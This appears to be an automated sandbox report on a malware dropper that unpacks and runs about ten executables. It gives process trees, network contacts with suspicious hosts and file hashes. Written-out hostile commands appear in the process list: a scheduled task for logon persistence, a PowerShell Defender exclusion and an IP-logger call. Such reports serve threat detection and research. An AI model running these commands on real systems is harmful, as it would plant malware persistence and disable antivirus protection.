PID 2464 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2256 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2256 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2256 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2256 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2256 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2256 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2256 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 1348 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 5d456d381f2e1.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 17e6077dcf7a402.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 61d1121b032c3d74.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c f08378aa2c3.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c APPNAME55.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 0637ac7677d0cf7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c d5a6f77b01f6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 08280a9f8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 97c06d9b6fa6f9.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 5d456d381f2e010.exe

C:\Users\Admin\AppData\Local\Temp\7zS4099E187\d5a6f77b01f6.exe

d5a6f77b01f6.exe

C:\Users\Admin\AppData\Local\Temp\7zS4099E187\61d1121b032c3d74.exe

61d1121b032c3d74.exe

C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e1.exe

5d456d381f2e1.exe

C:\Users\Admin\AppData\Local\Temp\7zS4099E187\97c06d9b6fa6f9.exe

97c06d9b6fa6f9.exe

C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e010.exe

5d456d381f2e010.exe

C:\Users\Admin\AppData\Local\Temp\7zS4099E187\17e6077dcf7a402.exe

17e6077dcf7a402.exe

C:\Users\Admin\AppData\Local\Temp\7zS4099E187\0637ac7677d0cf7.exe

0637ac7677d0cf7.exe

C:\Users\Admin\AppData\Local\Temp\7zS4099E187\f08378aa2c3.exe

f08378aa2c3.exe

C:\Users\Admin\AppData\Local\Temp\7zS4099E187\08280a9f8.exe

08280a9f8.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Users\Admin\AppData\Local\Temp\7zS4099E187\17e6077dcf7a402.exe

"C:\Users\Admin\AppData\Local\Temp\7zS4099E187\17e6077dcf7a402.exe" -a

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2464 -s 432

C:\Users\Admin\AppData\Local\Temp\chrome2.exe

"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Windows\winnetdriv.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1733562935 0

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\7zS7C32.tmp\Install.cmd" "

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/16B4c7

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1648 CREDAT:275457 /prefetch:2

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "6066997243404308411616389141271503795-2051169285-1437018274-109970240-1466237832"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}

Network

Country Destination Domain Proto
US 8.8.8.8:53 marisana.xyz udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 db-ip.com udp
US 8.8.8.8:53 live.goatgame.live udp
US 104.26.4.15:443 db-ip.com tcp
US 8.8.8.8:53 api.db-ip.com udp
US 104.26.5.15:443 api.db-ip.com tcp
US 8.8.8.8:53 www.maxmind.com udp
US 104.17.27.25:80 www.maxmind.com tcp
GB 37.0.8.235:80 tcp
US 8.8.8.8:53 prophefliloc.tumblr.com udp
US 74.114.154.18:443 prophefliloc.tumblr.com tcp
N/A 127.0.0.1:49266 tcp
N/A 127.0.0.1:49268 tcp
MD 176.123.2.239:80 176.123.2.239 tcp
US 8.8.8.8:53 music-sec.xyz udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
MD 176.123.2.239:80 176.123.2.239 tcp
US 8.8.8.8:53 www.wpdsfds23x.com udp
US 8.8.8.8:53 iplogger.org udp
US 104.26.2.46:443 iplogger.org tcp
US 104.26.2.46:443 iplogger.org tcp
SG 37.0.11.8:80 tcp
US 8.8.8.8:53 www.microsoft.com udp
DE 2.21.137.121:80 www.microsoft.com tcp
US 8.8.8.8:53 crl.microsoft.com udp
BE 2.17.107.81:80 crl.microsoft.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
SG 37.0.10.236:80 tcp
US 104.26.2.46:443 iplogger.org tcp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 c.pki.goog udp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.178.3:80 c.pki.goog tcp
GB 142.250.178.3:80 c.pki.goog tcp
US 8.8.8.8:53 www.microsoft.com udp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
SG 37.0.10.236:80 tcp
US 8.8.8.8:53 sanctam.net udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
SG 37.0.10.236:80 tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
SG 37.0.10.236:80 tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
SG 37.0.10.236:80 tcp
LV 45.142.213.135:30058 tcp

Files

\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe

MD5 25eb7c88cb3002c4029dd7e1aec7f63b
SHA1 cf1bf4283ee16d0a94fc65c82233f9eb69b1db70
SHA256 152b187c8a5d36e4b7f7728a0ac261294790f84b269b6e872ef24d966bcc5ca2
SHA512 f0c627bcb6774253e7c3689265ae30241cb77b45aa0adf0434bb26c173ac43dfd188a6ac7b36a152d1c145afe34a73ea3f765a9892eff0d7b96960d47c58137d

C:\Users\Admin\AppData\Local\Temp\7zS4099E187\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\7zS4099E187\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

C:\Users\Admin\AppData\Local\Temp\7zS4099E187\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

memory/2464-30-0x000000006B280000-0x000000006B2A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS4099E187\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/2464-31-0x000000006B440000-0x000000006B4CF000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS4099E187\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

memory/2464-45-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2464-47-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2464-48-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2464-46-0x000000006B280000-0x000000006B2A6000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS4099E187\d5a6f77b01f6.exe

MD5 7aaf005f77eea53dc227734db8d7090b
SHA1 b6be1dde4cf73bbf0d47c9e07734e96b3442ed59
SHA256 a5f373f8bcfae3d9f4895c477206de63f66f08e66b413114cf2666bed798eb71
SHA512 19dc8764c5347a73767caed67a8a3f2fe0ecb07cacf2f7b2a27a48592780dede684cfb52932695a79725a047f2c092b29a52b5fd0c7dc024a0166e6ada25633d

\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e1.exe

MD5 6cae1487c1ba88b65eead225c280d78c
SHA1 e2624ce9267706b64ee724abe6e7dc8e1dcafd32
SHA256 d3cd0b6963c1b88ff327eee0953c9e30ed3fe4ed7cc198a949b285b626c237d6
SHA512 7bc375e863cc33a7f9c7b24a4c050a73d74a6cc5002713ec1fc3eed8760a8883dd4c7b9f0f3e9c008a71d66b692c4ff8620d574b0f48c0ce531d8f0d4e8fa45a

C:\Users\Admin\AppData\Local\Temp\7zS4099E187\61d1121b032c3d74.exe

MD5 2b32e3fb6d4deb5e9f825f9c9f0c75a6
SHA1 2049fdbbe5b72ff06a7746b57582c9faa6186146
SHA256 8bd8f7a32de3d979cae2f487ad2cc5a495afa1bfb1c740e337c47d1e2196e1f2
SHA512 ad811d1882aa33cce0ebbab82e3f2db7596f88392cd9c142aef0b0caa4004afcf0253f25e7a8f228778dd3a2ec43d2028985a3e85807438c5bed3ae4709f9cfa

C:\Users\Admin\AppData\Local\Temp\7zS4099E187\97c06d9b6fa6f9.exe

MD5 13a289feeb15827860a55bbc5e5d498f
SHA1 e1f0a544fcc5b3bc0ab6a788343185ad1ad077ad
SHA256 c5483b2acbb352dc5c9a811d9616c4519f0e07c13905552be5ec869613ada775
SHA512 00c225fb1d88920c5df7bb853d32213a91254fb8c57169c58c8b0ffab4501486e24d87e3d8f5665b16e366362cb81deec535d833ed42434fdc31f0400ee7ffa7

memory/2464-44-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2464-43-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2464-42-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2464-41-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2464-40-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2464-39-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e010.exe

MD5 0965da18bfbf19bafb1c414882e19081
SHA1 e4556bac206f74d3a3d3f637e594507c30707240
SHA256 1cdddf182f161ab789edfcc68a0706d0b8412a9ba67a3f918fe60fab270eabff
SHA512 fe4702a2fde36b4fb0015ad7d3e2169a1ccbf5e29d7edef40f104ed47661b4b0365b13b1913e9f4e0ab7bc9ac542ee86c02a802a13567dfd0b8f5485a5be829b

memory/1616-86-0x0000000000AF0000-0x0000000000AF8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS4099E187\0637ac7677d0cf7.exe

MD5 7e06ee9bf79e2861433d6d2b8ff4694d
SHA1 28de30147de38f968958e91770e69ceb33e35eb5
SHA256 e254914f5f7feb6bf10041e2c705d469bc2b292d709dc944381db5911beb1d9f
SHA512 225cd5e37dbc29aad1d242582748457112b0adb626541a6876c2c6a0e6a27d986791654fd94458e557c628dc16db17f22db037853fae7c41dde34ba4e7245081

\Users\Admin\AppData\Local\Temp\7zS4099E187\17e6077dcf7a402.exe

MD5 3263859df4866bf393d46f06f331a08f
SHA1 5b4665de13c9727a502f4d11afb800b075929d6c
SHA256 9dcacda3913e30cafd92c909648b5bffde14b8e39e6adbfb15628006c0d4d3c2
SHA512 58205110a017f5d73dd131fefb1e3bbbcc670ed0c645aeefebe5281579c7b1dceffa56671cd7b186554bdb81710e21018ed0d7088a27517dfc5e48d6d3578cf6

\Users\Admin\AppData\Local\Temp\7zS4099E187\08280a9f8.exe

MD5 5866ab1fae31526ed81bfbdf95220190
SHA1 75a5e08b3b9ad2dff35dfbbb3ffe8d983c2be25f
SHA256 9e1a149370efe9814bf2cbd87acfcfa410d1769efd86a9722da4373d6716d22e
SHA512 8d99ab09e84e4ef309da34be94946cbfcffeb1c0ca49e2452deb738d801e551062ebb134f1b99a9baf03003a8e720d525521ce09aeac341d3cba3fcfbc618fb5

C:\Users\Admin\AppData\Local\Temp\7zS4099E187\f08378aa2c3.exe

MD5 7e51418ec90a49b4b6b3ce8e4ba26ba1
SHA1 9cc182ef14b4731d3c45930161afb0ee170d885c
SHA256 50c924e0f3b319b8f66278419f3c0dbd14c1c7d8d33e32d70ee1a959df30d4ae
SHA512 eadb844d9e570bc9339289a2dc4d5d76cc36ada19ff653af9e2a932d1aea083e33bebe65471637ff54e2ac8c36573bbcc243dd617d4391aef53a9fb184f41f7b

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

MD5 ef5fa848e94c287b76178579cf9b4ad0
SHA1 560215a7c4c3f1095f0a9fb24e2df52d50de0237
SHA256 949eec48613bd1ce5dd05631602e1e1571fa9d6b0034ab1bffe313e923aff29c
SHA512 7d4184aa762f3db66cf36955f20374bf55f4c5dbe60130deaeade392296a4124867c141f1d5e7fbf60b640ef09cce8fb04b76b7dd20cbac2ce4033f9882a1071

memory/1940-113-0x0000000000EB0000-0x0000000000EDC000-memory.dmp

memory/2960-127-0x0000000000400000-0x0000000002C6E000-memory.dmp

memory/1940-128-0x00000000001C0000-0x00000000001C6000-memory.dmp

memory/1940-129-0x00000000003F0000-0x0000000000410000-memory.dmp

memory/1940-130-0x00000000001D0000-0x00000000001D6000-memory.dmp

memory/2268-132-0x0000000001140000-0x0000000001282000-memory.dmp

memory/2648-131-0x0000000000B80000-0x0000000000C6E000-memory.dmp

memory/1076-137-0x000000013F840000-0x000000013F850000-memory.dmp

memory/680-141-0x0000000000550000-0x0000000000634000-memory.dmp

C:\Windows\winnetdriv.exe

MD5 01ad10e59fa396af2d5443c5a14c1b21
SHA1 f209a4f0bb2a96e3ee6a55689e7f00e79c04f722
SHA256 bef1cffaba8186ce62265e0b322ca9fd9326a8929591df569a4953456c752137
SHA512 1e067ade999ff933a644fde66c6ab9abb8a960ce1c8064368adcde4c09d924bd22d1b43c68b7c968e982fc75937969a2876e9e2a024f72e693f9ba397d449e02

memory/2064-152-0x00000000001A0000-0x0000000000284000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabC370.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\TarC392.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

memory/2464-203-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2464-202-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2464-201-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2464-199-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2464-196-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2464-195-0x0000000000400000-0x00000000009D2000-memory.dmp

C:\ProgramData\softokn3.dll

MD5 a378c450e6ad9f1e0356ed46da190990
SHA1 d457a2c162391d2ea30ec2dc62c8fb3b973f6a66
SHA256 b745b0c0db87a89de5e542e9ae0a06f585793ac3f4240bff3524e7dbdba79978
SHA512 e6cdc8f570af97e48b1d8968730db0afc46f9dd6ad7366a936a5518801debb61c86cc61526e5e26e7ad3b3daeb76a19b32d7c0da33140597f6d19163683c12b5

memory/2268-226-0x0000000000350000-0x0000000000362000-memory.dmp

memory/2432-227-0x0000000000400000-0x0000000002CC9000-memory.dmp

memory/2432-244-0x0000000000400000-0x0000000002CC9000-memory.dmp

memory/1076-246-0x0000000000760000-0x000000000076E000-memory.dmp

C:\Users\Admin\AppData\Roaming\services64.exe

MD5 ad0aca1934f02768fd5fedaf4d9762a3
SHA1 0e5b8372015d81200c4eff22823e854d0030f305
SHA256 dc10f50f9761f6fbafe665e75a331b2048a285b1857ad95e0611ace825cba388
SHA512 2fba342010ba85440784190245f74ea9e7c70974df12c241ccb6b72a6e1006a72bd1fa2e657f434d7479758f9508edb315398f6e95d167a78b788cea732be3b7

memory/2700-250-0x000000013F2A0000-0x000000013F2B0000-memory.dmp

memory/2268-251-0x00000000064B0000-0x000000000653C000-memory.dmp

memory/2268-252-0x0000000000730000-0x000000000074E000-memory.dmp

memory/1032-253-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1032-262-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1032-261-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1032-259-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1032-257-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1032-255-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1032-268-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1032-267-0x0000000000400000-0x000000000041E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS7C32.tmp\Install.cmd

MD5 a3c236c7c80bbcad8a4efe06a5253731
SHA1 f48877ba24a1c5c5e070ca5ecb4f1fb4db363c07
SHA256 9a9e87561a30b24ad4ad95c763ec931a7cfcc0f4a5c23d12336807a61b089d7d
SHA512 dc73af4694b0d8390bcae0e9fd673b982d2c39f20ca4382fddc6475a70891ce9d8e86c2501d149e308c18cd4d3a335cc3411157de23acf6557ed21578c5f49cc

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\40WV1DY9\favicon[1].png

MD5 18c023bc439b446f91bf942270882422
SHA1 768d59e3085976dba252232a65a4af562675f782
SHA256 e0e71acef1efbfab69a1a60cd8fadded948d0e47a0a27c59a0be7033f6a84482
SHA512 a95ad7b48596bc0af23d05d1e58681e5d65e707247f96c5bc088880f4525312a1834a89615a0e33aea6b066793088a193ec29b5c96ea216f531c443487ae0735

